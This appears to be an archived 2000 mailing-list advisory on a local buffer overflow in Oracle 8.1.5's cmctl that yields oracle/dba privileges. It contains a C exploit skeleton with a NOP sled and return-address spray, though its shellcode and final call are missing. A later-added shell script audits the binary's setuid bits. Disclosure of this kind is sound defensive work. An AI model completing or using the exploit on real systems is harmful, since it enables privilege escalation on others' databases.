
vulnerability in Connection Manager Control binary in Oracle 8.1.5 Linux Platform.
From: Juan Manuel Pascual Escriba <pask () PLAZASITE COM>
Date: Mon, 20 Nov 2000 12:57:42 +0100

Hello Elias

        Could you make this advisory public? Oracle people haven't sent an
answer in 6 days. Please cut these lines.


                  System & Security Division

   Title:     Vulnerability in cmctl in Oracle 8.1.5
    Date:     13-11-2000
Platform:     Only tested in Linux, but can be exported to others.
  Impact:     Any user gains euid=oracle & egid=dba.
  Author:     Juan Manuel Pascual (pask () plazasite com)
  Status:     Vendor Contacted. Details Below


    cmctl is the Connection Manager Control binary.


    There is a buffer overflow in cmctl that can be used by local
users to obtain the euid of the oracle user and the egid of dba. With the
default installation the oracle user owns all database files.


    Any user with local access can gain euid=oracle and egid=dba.


    Maybe a chmod -s ;-)))).


    Vendor was contacted 13/11. No answers were received in the last
4 days.

This vulnerability was researched by:
Juan Manuel Pascual Escriba            pask () plazasite com

Exploit Code for cmctl in Oracle 8.1.5 (8i) for Linux. I tested it on RH
and 6.1. It is possible to export it to other platforms.

If someone exports this to Sparc please tell me.

synopsis: buffer overflow in cmctl
Impact:   any user gains euid=oracle and egid=dba.

Dedicated to cmlc guys: juaroflin, oscar, ismak, blas, blackbas and
Thanks for your patience and time.

Special Thanks to my favourite DBA. Xavi "de verdad como sois" Morales.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DEFAULT_OFFSET                    1
#define DEFAULT_BUFFER_SIZE             350
#define NOP                            0x90
#define BINARY  "/usr/local/oracle8i/app/oracle/product/8.1.5/bin/cmctl echo $pakito"

/* the shellcode bytes were not preserved in the archived post */
char shellcode[] = "";

/* returns the current stack pointer (i386) */
unsigned long get_sp(void) {
   __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[]) {
  char *buff, *ptr,*name[3],environ[100],binary[120];
  long *addr_ptr, addr;
  int i;
  int offset = DEFAULT_OFFSET;       /* stack offset, overridable from argv[1] */
  int bsize  = DEFAULT_BUFFER_SIZE;  /* size of the buffer handed to cmctl */

  if (argc > 1) offset  = atoi(argv[1]);
  printf("Use ./cmctl_start Offset\n");

  buff = malloc(bsize);
  addr = get_sp() - offset;
  ptr = buff;
  addr_ptr = (long *) ptr;
  /* fill the whole buffer with the guessed return address */
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  /* the first half becomes a NOP sled */
  for (i = 0; i < bsize/2; i++)
    buff[i] = NOP;

  /* the shellcode goes in the middle of the sled */
  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';

  /* the remainder of main() (environment set-up and the call to BINARY)
     is missing from the archived post */
  return 0;
}



                " In God We trust, Others We monitor "

         Juan Manuel Pascual Escribá        Systems Administrator
         PlazaSite S.A.                         c/ Tomás Bretón 32-38
         08950 Esplugues de Llobregat           (Barcelona),    SPAIN
         Ph: +34 93 3717398                       Fax: +34 93 3711968
         mob: 667591142                     Email: pask () plazasite com
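An added audit helper, not part of the original post or of Oracle's tooling: it checks whether cmctl, at the install path used in the exploit's #define above, still carries the setuid/setgid bits that turn this overflow into a privilege escalation, reports the owner, and prints the chmod -s workaround the advisory mentions. The path and the oracle:dba ownership are assumptions taken from the advisory; pass other paths as arguments.

```shell
#!/bin/sh
# Audit helper (added example, not from the original advisory).
# Reports whether a binary is setuid/setgid and who owns it, so an admin
# can decide whether to strip the bits until a vendor fix is available.

# Path taken from the advisory's exploit; adjust for your ORACLE_HOME.
CMCTL_PATH="/usr/local/oracle8i/app/oracle/product/8.1.5/bin/cmctl"

# is_privileged_mode MODE: MODE is the 10-character mode field from `ls -l`.
# Returns 0 when the setuid (char 4) or setgid (char 7) bit is set.
is_privileged_mode() {
    mode=$1
    case "$mode" in
        ???[sS]??????* ) return 0 ;;   # setuid bit present
        ??????[sS]???* ) return 0 ;;   # setgid bit present
        * ) return 1 ;;
    esac
}

# audit_binary PATH: print a one-line verdict.
# Returns 0 if the file is setuid/setgid, 1 if it is not, 2 if it is missing.
audit_binary() {
    path=$1
    if [ ! -e "$path" ]; then
        echo "MISSING     $path"
        return 2
    fi
    line=$(ls -ld "$path")
    mode=$(printf '%s\n' "$line" | cut -c1-10)
    owner=$(printf '%s\n' "$line" | awk '{print $3 ":" $4}')
    if is_privileged_mode "$mode"; then
        echo "PRIVILEGED  $mode  $owner  $path"
        echo "  a local user who triggers the overflow runs as $owner"
        echo "  interim fix suggested by the advisory: chmod -s '$path'"
        return 0
    fi
    echo "ok          $mode  $owner  $path"
    return 1
}

# Check the advisory's path plus any further paths given on the command line.
for p in "$CMCTL_PATH" "$@"; do
    audit_binary "$p" || true
done
```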
